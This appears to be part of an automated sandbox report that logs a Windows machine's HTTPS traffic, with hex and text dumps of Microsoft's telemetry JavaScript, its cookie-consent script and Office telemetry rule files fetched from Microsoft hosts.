                                                                                                                                                                                  Data Ascii: /*! * 1DS JSLL SKU, 4.3.3 * Copyright (c) Microsoft and contributors. All rights reserved. * (Microsoft Internal Only) */!function(e,t){var n="undefined";if("object"==typeof exports&&typeof module!=n)t(exports);else if("function"==typeof define&&defi
                                                                                                                                                                                  2024-11-23 18:53:05 UTC16384INData Raw: 22 2b 74 5d 29 3f 6e 28 69 29 3a 28 72 3d 66 65 28 22 63 6f 6e 73 6f 6c 65 22 29 29 26 26 28 72 2e 65 72 72 6f 72 7c 7c 72 2e 6c 6f 67 29 28 74 2c 63 65 28 69 29 29 29 29 7d 53 65 28 61 3d 7b 74 68 65 6e 3a 6f 2c 22 63 61 74 63 68 22 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6f 28 75 6e 64 65 66 69 6e 65 64 2c 65 29 7d 2c 22 66 69 6e 61 6c 6c 79 22 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 74 2c 6e 3d 74 3b 72 65 74 75 72 6e 20 51 28 74 29 26 26 28 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 26 26 74 28 29 2c 65 7d 2c 6e 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 74 68 72 6f 77 20 74 26 26 74 28 29 2c 65 7d 29 2c 6f 28 65 2c 6e 29 7d 7d 2c 22 73 74 61 74 65 22 2c 7b 67 65 74 3a 64 7d 29 2c 68 74 28 29 26
                                                                                                                                                                                  Data Ascii: "+t])?n(i):(r=fe("console"))&&(r.error||r.log)(t,ce(i))))}Se(a={then:o,"catch":function(e){return o(undefined,e)},"finally":function(t){var e=t,n=t;return Q(t)&&(e=function(e){return t&&t(),e},n=function(e){throw t&&t(),e}),o(e,n)}},"state",{get:d}),ht()&
                                                                                                                                                                                  2024-11-23 18:53:05 UTC16384INData Raw: 74 69 6f 6e 20 67 63 28 65 2c 74 2c 6e 2c 72 29 7b 67 65 28 65 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 26 26 65 5b 74 5d 26 26 28 6e 3f 28 6e 2e 63 62 5b 74 65 5d 28 7b 66 6e 3a 72 2c 61 72 67 3a 65 7d 29 2c 6e 2e 68 3d 6e 2e 68 7c 7c 6e 6e 28 70 63 2c 30 2c 6e 29 29 3a 4d 28 72 2c 5b 65 5d 29 29 7d 29 7d 68 63 2e 5f 5f 69 65 44 79 6e 3d 31 3b 76 61 72 20 76 63 3d 68 63 3b 66 75 6e 63 74 69 6f 6e 20 68 63 28 65 29 7b 74 68 69 73 2e 6c 69 73 74 65 6e 65 72 73 3d 5b 5d 3b 76 61 72 20 6e 2c 69 3d 5b 5d 2c 61 3d 7b 68 3a 6e 75 6c 6c 2c 63 62 3a 5b 5d 7d 2c 6f 3d 76 6f 28 65 2c 64 63 29 5b 4b 6e 5d 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6e 3d 21 21 65 2e 63 66 67 2e 70 65 72 66 45 76 74 73 53 65 6e 64 41 6c 6c 7d 29 3b 76 65 28 68 63 2c 74 68 69 73 2c 66 75
                                                                                                                                                                                  Data Ascii: tion gc(e,t,n,r){ge(e,function(e){e&&e[t]&&(n?(n.cb[te]({fn:r,arg:e}),n.h=n.h||nn(pc,0,n)):M(r,[e]))})}hc.__ieDyn=1;var vc=hc;function hc(e){this.listeners=[];var n,i=[],a={h:null,cb:[]},o=vo(e,dc)[Kn](function(e){n=!!e.cfg.perfEvtsSendAll});ve(hc,this,fu
                                                                                                                                                                                  2024-11-23 18:53:05 UTC16384INData Raw: 29 2c 68 28 29 2c 6d 28 65 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 61 2e 66 6c 75 73 68 43 6f 6d 70 6c 65 74 65 3d 65 2c 50 3d 21 30 2c 52 2e 72 75 6e 28 6f 2c 61 29 2c 66 5b 67 72 5d 28 29 2c 6f 5b 6c 72 5d 28 61 29 7d 2c 36 2c 6e 29 2c 69 7d 2c 66 5b 6f 72 5d 3d 73 2c 66 2e 61 64 64 50 6c 75 67 69 6e 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 2c 72 29 7b 69 66 28 21 65 29 72 65 74 75 72 6e 20 72 26 26 72 28 21 31 29 2c 76 6f 69 64 20 43 28 6f 75 29 3b 76 61 72 20 69 3d 73 28 65 5b 24 6e 5d 29 3b 69 66 28 69 26 26 21 74 29 72 65 74 75 72 6e 20 72 26 26 72 28 21 31 29 2c 76 6f 69 64 20 43 28 22 50 6c 75 67 69 6e 20 5b 22 2b 65 5b 24 6e 5d 2b 22 5d 20 69 73 20 61 6c 72 65 61 64 79 20 6c 6f 61 64 65 64 21 22 29 3b 76 61 72 20 61 2c 6f 3d 7b 72 65 61 73 6f
                                                                                                                                                                                  Data Ascii: ),h(),m(e,function(e){a.flushComplete=e,P=!0,R.run(o,a),f[gr](),o[lr](a)},6,n),i},f[or]=s,f.addPlugin=function(e,t,n,r){if(!e)return r&&r(!1),void C(ou);var i=s(e[$n]);if(i&&!t)return r&&r(!1),void C("Plugin ["+e[$n]+"] is already loaded!");var a,o={reaso
                                                                                                                                                                                  2024-11-23 18:53:05 UTC16384INData Raw: 28 7b 4e 6f 72 6d 61 6c 3a 31 2c 43 72 69 74 69 63 61 6c 3a 32 7d 29 2c 75 6e 64 65 66 69 6e 65 64 2c 75 6e 64 65 66 69 6e 65 64 29 2c 53 6c 3d 22 22 3b 66 75 6e 63 74 69 6f 6e 20 78 6c 28 65 29 7b 74 72 79 7b 69 66 28 6f 65 28 6f 74 28 29 29 29 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 76 61 72 20 74 3d 28 6e 65 77 20 44 61 74 65 29 5b 4f 73 5d 28 29 2c 6e 3d 66 65 28 65 3d 3d 3d 45 6c 2e 4c 6f 63 61 6c 53 74 6f 72 61 67 65 3f 22 6c 6f 63 61 6c 53 74 6f 72 61 67 65 22 3a 22 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 22 29 2c 72 3d 53 6c 2b 74 2c 69 3d 28 6e 2e 73 65 74 49 74 65 6d 28 72 2c 74 29 2c 6e 2e 67 65 74 49 74 65 6d 28 72 29 21 3d 3d 74 29 3b 69 66 28 6e 5b 52 73 5d 28 72 29 2c 21 69 29 72 65 74 75 72 6e 20 6e 7d 63 61 74 63 68 28 61 29 7b 7d 72 65 74
                                                                                                                                                                                  Data Ascii: ({Normal:1,Critical:2}),undefined,undefined),Sl="";function xl(e){try{if(oe(ot()))return null;var t=(new Date)[Os](),n=fe(e===El.LocalStorage?"localStorage":"sessionStorage"),r=Sl+t,i=(n.setItem(r,t),n.getItem(r)!==t);if(n[Rs](r),!i)return n}catch(a){}ret
                                                                                                                                                                                  2024-11-23 18:53:05 UTC16384INData Raw: 28 6f 2c 22 41 75 74 6f 20 74 72 61 63 6b 20 70 61 67 65 20 76 69 73 69 74 20 74 69 6d 65 20 66 61 69 6c 65 64 2c 20 6d 65 74 72 69 63 20 77 69 6c 6c 20 6e 6f 74 20 62 65 20 63 6f 6c 6c 65 63 74 65 64 3a 20 22 2b 63 65 28 72 29 29 7d 7d 2c 59 28 65 2c 22 5f 6c 6f 67 67 65 72 22 2c 7b 67 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6f 7d 7d 29 2c 59 28 65 2c 22 70 61 67 65 56 69 73 69 74 54 69 6d 65 54 72 61 63 6b 69 6e 67 48 61 6e 64 6c 65 72 22 2c 7b 67 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 63 7d 7d 29 7d 29 7d 76 61 72 20 4e 64 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 74 68 69 73 5b 67 64 5d 3d 50 74 28 29 2c 74 68 69 73 2e 70 61 67 65 4e 61 6d 65 3d 65 2c 74 68 69 73 2e 70 61 67 65 55 72 6c 3d 74 7d 2c 44 64 3d 66 75
                                                                                                                                                                                  Data Ascii: (o,"Auto track page visit time failed, metric will not be collected: "+ce(r))}},Y(e,"_logger",{g:function(){return o}}),Y(e,"pageVisitTimeTrackingHandler",{g:function(){return c}})})}var Nd=function(e,t){this[gd]=Pt(),this.pageName=e,this.pageUrl=t},Dd=fu
                                                                                                                                                                                  2024-11-23 18:53:05 UTC16384INData Raw: 63 6f 6e 66 69 67 2e 63 6f 72 65 44 61 74 61 2c 22 62 65 68 61 76 69 6f 72 22 29 2c 75 65 28 6e 2e 70 61 67 65 54 79 70 65 29 26 26 28 65 2e 70 61 67 65 54 79 70 65 3d 6e 2e 70 61 67 65 54 79 70 65 29 2c 75 65 28 72 2e 5f 70 61 67 65 54 79 70 65 4d 65 74 61 54 61 67 29 26 26 21 75 65 28 65 2e 70 61 67 65 54 79 70 65 29 26 26 28 65 2e 70 61 67 65 54 79 70 65 3d 72 2e 5f 70 61 67 65 54 79 70 65 4d 65 74 61 54 61 67 29 2c 75 65 28 72 2e 5f 6d 61 72 6b 65 74 4d 65 74 61 54 61 67 29 26 26 28 65 2e 6d 61 72 6b 65 74 3d 72 2e 5f 6d 61 72 6b 65 74 4d 65 74 61 54 61 67 29 2c 65 2e 69 73 4c 6f 67 67 65 64 49 6e 3d 47 64 28 72 2e 5f 63 6f 6e 66 69 67 29 2c 74 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 3d 6f 63 28 29 7d 2c 69 70 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 73
                                                                                                                                                                                  Data Ascii: config.coreData,"behavior"),ue(n.pageType)&&(e.pageType=n.pageType),ue(r._pageTypeMetaTag)&&!ue(e.pageType)&&(e.pageType=r._pageTypeMetaTag),ue(r._marketMetaTag)&&(e.market=r._marketMetaTag),e.isLoggedIn=Gd(r._config),t.cookieEnabled=oc()},ip.prototype._s
                                                                                                                                                                                  2024-11-23 18:53:06 UTC16384INData Raw: 65 29 72 65 74 75 72 6e 21 30 3b 72 65 74 75 72 6e 21 31 7d 2c 41 70 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 69 73 54 72 61 63 6b 65 64 57 69 74 68 44 61 74 61 42 69 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 65 2e 61 74 74 72 69 62 75 74 65 73 2c 6e 3d 30 3b 6e 3c 74 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 69 66 28 7e 74 5b 6e 5d 2e 6e 61 6d 65 2e 69 6e 64 65 78 4f 66 28 22 64 61 74 61 2d 62 69 2d 22 29 29 72 65 74 75 72 6e 21 30 3b 72 65 74 75 72 6e 21 31 7d 2c 41 70 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 69 73 54 72 61 63 6b 65 64 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 65 2e 61 74 74 72 69 62 75 74 65 73 2c 6e 3d 30 3b 6e 3c 74 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 69 66 28 22 64 61 74 61 2d 6d 22 3d 3d 3d 74
                                                                                                                                                                                  Data Ascii: e)return!0;return!1},Ap.prototype._isTrackedWithDataBi=function(e){for(var t=e.attributes,n=0;n<t.length;n++)if(~t[n].name.indexOf("data-bi-"))return!0;return!1},Ap.prototype._isTracked=function(e){for(var t=e.attributes,n=0;n<t.length;n++)if("data-m"===t
                                                                                                                                                                                  2024-11-23 18:53:06 UTC16384INData Raw: 67 3d 22 57 65 62 41 75 74 68 54 6f 6b 65 6e 22 2c 61 3d 22 41 75 74 68 58 54 6f 6b 65 6e 22 2c 67 67 3d 22 6d 73 66 70 63 22 2c 76 67 3d 22 75 73 65 72 22 2c 68 67 3d 22 61 6c 6c 6f 77 52 65 71 75 65 73 74 53 65 6e 64 69 6e 67 22 2c 6d 67 3d 22 66 69 72 73 74 52 65 71 75 65 73 74 53 65 6e 74 22 2c 79 67 3d 22 73 68 6f 75 6c 64 41 64 64 43 6c 6f 63 6b 53 6b 65 77 48 65 61 64 65 72 73 22 2c 43 67 3d 22 67 65 74 43 6c 6f 63 6b 53 6b 65 77 48 65 61 64 65 72 56 61 6c 75 65 22 2c 62 67 3d 22 73 65 74 43 6c 6f 63 6b 53 6b 65 77 22 2c 79 65 3d 22 6c 65 6e 67 74 68 22 2c 54 67 3d 22 63 6f 6e 63 61 74 22 2c 49 67 3d 22 69 4b 65 79 22 2c 45 67 3d 22 63 6f 75 6e 74 22 2c 5f 67 3d 22 65 76 65 6e 74 73 22 2c 53 67 3d 22 70 75 73 68 22 2c 78 67 3d 22 73 70 6c 69 74 22
                                                                                                                                                                                  Data Ascii: g="WebAuthToken",a="AuthXToken",gg="msfpc",vg="user",hg="allowRequestSending",mg="firstRequestSent",yg="shouldAddClockSkewHeaders",Cg="getClockSkewHeaderValue",bg="setClockSkew",ye="length",Tg="concat",Ig="iKey",Eg="count",_g="events",Sg="push",xg="split"
                                                                                                                                                                                  2024-11-23 18:53:06 UTC16384INData Raw: 61 28 65 5b 6d 76 5d 29 29 2c 65 5b 6c 76 5d 26 26 28 65 5b 6c 76 5d 3d 65 61 28 65 5b 6c 76 5d 29 29 29 7d 66 75 6e 63 74 69 6f 6e 20 61 28 65 2c 74 29 7b 69 66 28 65 5b 79 76 5d 7c 7c 28 65 5b 79 76 5d 3d 30 29 2c 65 5b 43 76 5d 7c 7c 28 65 5b 43 76 5d 3d 31 29 2c 6c 28 65 29 2c 65 5b 62 76 5d 29 69 66 28 55 7c 7c 61 65 29 65 5b 43 76 5d 3d 33 2c 65 5b 62 76 5d 3d 21 31 3b 65 6c 73 65 20 69 66 28 48 29 72 65 74 75 72 6e 20 57 26 26 28 65 3d 65 61 28 65 29 29 2c 48 5b 72 76 5d 28 45 76 2e 63 72 65 61 74 65 28 65 5b 49 67 5d 2c 5b 65 5d 29 2c 21 30 3d 3d 3d 65 5b 62 76 5d 3f 31 3a 65 5b 62 76 5d 2c 33 29 3b 76 61 72 20 6e 3d 65 5b 43 76 5d 2c 72 3d 63 65 2c 69 3d 52 2c 61 3d 28 34 3d 3d 3d 6e 26 26 28 72 3d 6f 65 2c 69 3d 4f 29 2c 21 31 29 3b 72 3c 69 3f
                                                                                                                                                                                  Data Ascii: a(e[mv])),e[lv]&&(e[lv]=ea(e[lv])))}function a(e,t){if(e[yv]||(e[yv]=0),e[Cv]||(e[Cv]=1),l(e),e[bv])if(U||ae)e[Cv]=3,e[bv]=!1;else if(H)return W&&(e=ea(e)),H[rv](Ev.create(e[Ig],[e]),!0===e[bv]?1:e[bv],3);var n=e[Cv],r=ce,i=R,a=(4===n&&(r=oe,i=O),!1);r<i?


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                  97192.168.2.74982213.107.246.634437964C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 18:53:05 UTC551OUTGET /mscc/lib/v2/wcp-consent.js HTTP/1.1
                                                                                                                                                                                  Host: wcpstatic.microsoft.com
                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                  Sec-Fetch-Site: same-site
                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                                                                                  Referer: https://learn.microsoft.com/
                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                  2024-11-23 18:53:05 UTC713INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 18:53:05 GMT
                                                                                                                                                                                  Content-Type: application/javascript
                                                                                                                                                                                  Content-Length: 52717
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                  Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Length,Date,Transfer-Encoding
                                                                                                                                                                                  Age: 42451
                                                                                                                                                                                  Cache-Control: max-age=43200
                                                                                                                                                                                  Content-MD5: QT/MdZzBmCG2G2lBgIsptQ==
                                                                                                                                                                                  Etag: 0x8DA85F6F74C6D08
                                                                                                                                                                                  Last-Modified: Wed, 24 Aug 2022 17:34:58 GMT
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  X-Cache: CONFIG_NOCACHE
                                                                                                                                                                                  x-ms-blob-type: BlockBlob
                                                                                                                                                                                  x-ms-lease-status: unlocked
                                                                                                                                                                                  x-ms-request-id: 3774b461-701e-003c-4476-3de918000000
                                                                                                                                                                                  x-ms-version: 2009-09-19
                                                                                                                                                                                  x-azure-ref: 20241123T185305Z-174c587ffdf4zw2thC1TEBu34000000003cg00000000dvx4
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 18:53:05 UTC15671INData Raw: 76 61 72 20 57 63 70 43 6f 6e 73 65 6e 74 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 7b 32 32 39 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 77 69 6e 64 6f 77 2c 65 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 6f 28 6e 29 7b 69 66 28 74 5b 6e 5d 29 72 65 74 75 72 6e 20 74 5b 6e 5d 2e 65 78 70 6f 72 74 73 3b 76 61 72 20 72 3d 74 5b 6e 5d 3d 7b 69 3a 6e 2c 6c 3a 21 31 2c 65 78 70 6f 72 74 73 3a 7b 7d 7d 3b 72 65 74 75 72 6e 20 65 5b 6e 5d 2e 63 61 6c 6c 28 72 2e 65 78 70 6f 72 74 73 2c 72 2c 72 2e 65 78 70 6f 72 74 73 2c 6f 29 2c 72 2e 6c 3d 21 30 2c 72 2e 65 78 70 6f 72 74 73 7d 72 65 74 75 72 6e 20 6f 2e 6d 3d 65 2c 6f 2e 63 3d 74 2c 6f 2e 64 3d 66 75 6e 63 74 69 6f 6e 28 65
                                                                                                                                                                                  Data Ascii: var WcpConsent;!function(){var e={229:function(e){window,e.exports=function(e){var t={};function o(n){if(t[n])return t[n].exports;var r=t[n]={i:n,l:!1,exports:{}};return e[n].call(r.exports,r,r.exports,o),r.l=!0,r.exports}return o.m=e,o.c=t,o.d=function(e
                                                                                                                                                                                  2024-11-23 18:53:05 UTC16384INData Raw: 29 7b 72 65 74 75 72 6e 20 65 3f 65 2e 72 65 70 6c 61 63 65 28 2f 26 2f 67 2c 22 26 61 6d 70 3b 22 29 2e 72 65 70 6c 61 63 65 28 2f 3c 2f 67 2c 22 26 6c 74 3b 22 29 2e 72 65 70 6c 61 63 65 28 2f 3e 2f 67 2c 22 26 67 74 3b 22 29 2e 72 65 70 6c 61 63 65 28 2f 22 2f 67 2c 22 26 71 75 6f 74 3b 22 29 2e 72 65 70 6c 61 63 65 28 2f 27 2f 67 2c 22 26 23 30 33 39 3b 22 29 3a 22 22 7d 2c 65 7d 28 29 2c 61 3d 6e 2e 6c 6f 63 61 6c 73 2c 6c 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 65 2c 74 2c 6f 2c 6e 2c 72 2c 69 2c 61 29 7b 74 68 69 73 2e 64 69 72 65 63 74 69 6f 6e 3d 22 6c 74 72 22 2c 74 68 69 73 2e 70 72 65 76 69 6f 75 73 46 6f 63 75 73 45 6c 65 6d 65 6e 74 42 65 66 6f 72 65 50 6f 70 75 70 3d 6e 75 6c 6c 2c 74 68 69 73 2e 63 6f 6f 6b 69
                                                                                                                                                                                  Data Ascii: ){return e?e.replace(/&/g,"&amp;").replace(/</g,"&lt;").replace(/>/g,"&gt;").replace(/"/g,"&quot;").replace(/'/g,"&#039;"):""},e}(),a=n.locals,l=function(){function e(e,t,o,n,r,i,a){this.direction="ltr",this.previousFocusElementBeforePopup=null,this.cooki
                                                                                                                                                                                  2024-11-23 18:53:05 UTC16384INData Raw: 6f 72 22 5d 2b 22 20 21 69 6d 70 6f 72 74 61 6e 74 3b 5c 6e 20 20 20 20 20 20 20 20 7d 22 2c 74 2b 3d 27 69 6e 70 75 74 5b 74 79 70 65 3d 22 72 61 64 69 6f 22 5d 2e 27 2b 63 2e 63 6f 6f 6b 69 65 49 74 65 6d 52 61 64 69 6f 42 74 6e 2b 22 20 2b 20 6c 61 62 65 6c 3a 68 6f 76 65 72 3a 3a 61 66 74 65 72 20 7b 5c 6e 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 22 2b 65 5b 22 72 61 64 69 6f 2d 62 75 74 74 6f 6e 2d 68 6f 76 65 72 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 22 5d 2b 22 20 21 69 6d 70 6f 72 74 61 6e 74 3b 5c 6e 20 20 20 20 20 20 20 20 7d 22 2c 74 2b 3d 27 69 6e 70 75 74 5b 74 79 70 65 3d 22 72 61 64 69 6f 22 5d 2e 27 2b 63 2e 63 6f 6f 6b 69 65 49 74 65 6d 52 61 64 69 6f 42 74 6e 2b 22 20 2b 20 6c
                                                                                                                                                                                  Data Ascii: or"]+" !important;\n }",t+='input[type="radio"].'+c.cookieItemRadioBtn+" + label:hover::after {\n background-color: "+e["radio-button-hover-background-color"]+" !important;\n }",t+='input[type="radio"].'+c.cookieItemRadioBtn+" + l
                                                                                                                                                                                  2024-11-23 18:53:05 UTC710INData Raw: 65 6d 65 6e 74 42 79 49 64 28 22 77 63 70 43 6f 6e 73 65 6e 74 42 61 6e 6e 65 72 43 74 72 6c 22 29 7d 2c 65 2e 65 6d 69 74 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 5b 5d 2c 6f 3d 31 3b 6f 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 6f 2b 2b 29 74 5b 6f 2d 31 5d 3d 61 72 67 75 6d 65 6e 74 73 5b 6f 5d 3b 76 61 72 20 6e 3d 74 68 69 73 2e 65 76 65 6e 74 73 5b 65 5d 3b 6e 26 26 6e 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 61 70 70 6c 79 28 6e 75 6c 6c 2c 74 29 7d 29 29 7d 2c 65 2e 70 72 6f 74 6f 74 79 70 65 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6f 29 7b 65 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 3f 65 2e 61 64 64 45 76 65 6e 74
                                                                                                                                                                                  Data Ascii: ementById("wcpConsentBannerCtrl")},e.emit=function(e){for(var t=[],o=1;o<arguments.length;o++)t[o-1]=arguments[o];var n=this.events[e];n&&n.forEach((function(e){e.apply(null,t)}))},e.prototype.addEventListener=function(e,t,o){e.addEventListener?e.addEvent
                                                                                                                                                                                  2024-11-23 18:53:05 UTC3568INData Raw: 74 28 22 2d 22 29 5b 30 5d 3b 6f 3d 65 2e 73 70 6c 69 74 28 22 2d 22 29 5b 30 5d 3d 3d 3d 6e 7d 72 65 74 75 72 6e 20 6f 7d 28 65 2c 63 29 7d 29 29 3b 73 26 26 30 3d 3d 3d 73 2e 6c 65 6e 67 74 68 26 26 28 65 3d 22 65 6e 2d 55 53 22 29 2c 6f 2e 70 6c 61 63 65 68 6f 6c 64 65 72 45 6c 65 6d 65 6e 74 3d 6c 2c 72 26 26 6f 2e 63 6f 6e 73 65 6e 74 43 68 61 6e 67 65 64 43 61 6c 6c 62 61 63 6b 73 2e 72 65 67 69 73 74 65 72 43 61 6c 6c 62 61 63 6b 28 72 29 2c 6f 2e 73 61 76 65 43 6f 6f 6b 69 65 28 29 2c 6f 2e 73 69 74 65 43 6f 6e 73 65 6e 74 3d 6e 65 77 20 66 28 21 31 29 2c 6e 75 6c 6c 3d 3d 6e 7c 7c 6e 28 76 6f 69 64 20 30 2c 6f 2e 73 69 74 65 43 6f 6e 73 65 6e 74 29 2c 6f 2e 69 73 49 6e 69 74 52 65 61 64 79 3d 21 30 2c 74 68 69 73 2e 63 6f 6e 73 65 6e 74 43 68 61
                                                                                                                                                                                  Data Ascii: t("-")[0];o=e.split("-")[0]===n}return o}(e,c)}));s&&0===s.length&&(e="en-US"),o.placeholderElement=l,r&&o.consentChangedCallbacks.registerCallback(r),o.saveCookie(),o.siteConsent=new f(!1),null==n||n(void 0,o.siteConsent),o.isInitReady=!0,this.consentCha


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  98192.168.2.74982313.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 18:53:05 UTC192OUTGET /rules/rule700201v1s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 18:53:05 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 18:53:05 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 1393
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:27:50 GMT
                                                                                                                                                                                  ETag: "0x8DC582BE39DFC9B"
                                                                                                                                                                                  x-ms-request-id: d30a2094-501e-0029-7248-3dd0b8000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T185305Z-15b8b599d88wk8w4hC1TEB14b800000003f0000000001bfn
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 18:53:05 UTC1393INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord"


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  99192.168.2.74982413.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 18:53:05 UTC192OUTGET /rules/rule700200v1s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 18:53:06 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 18:53:06 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 1356
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                                                                                                                                  ETag: "0x8DC582BDF66E42D"
                                                                                                                                                                                  x-ms-request-id: 31c6069e-e01e-001f-7f36-3d1633000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T185306Z-15b8b599d88wn9hhhC1TEBry0g00000003dg000000007k6h
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
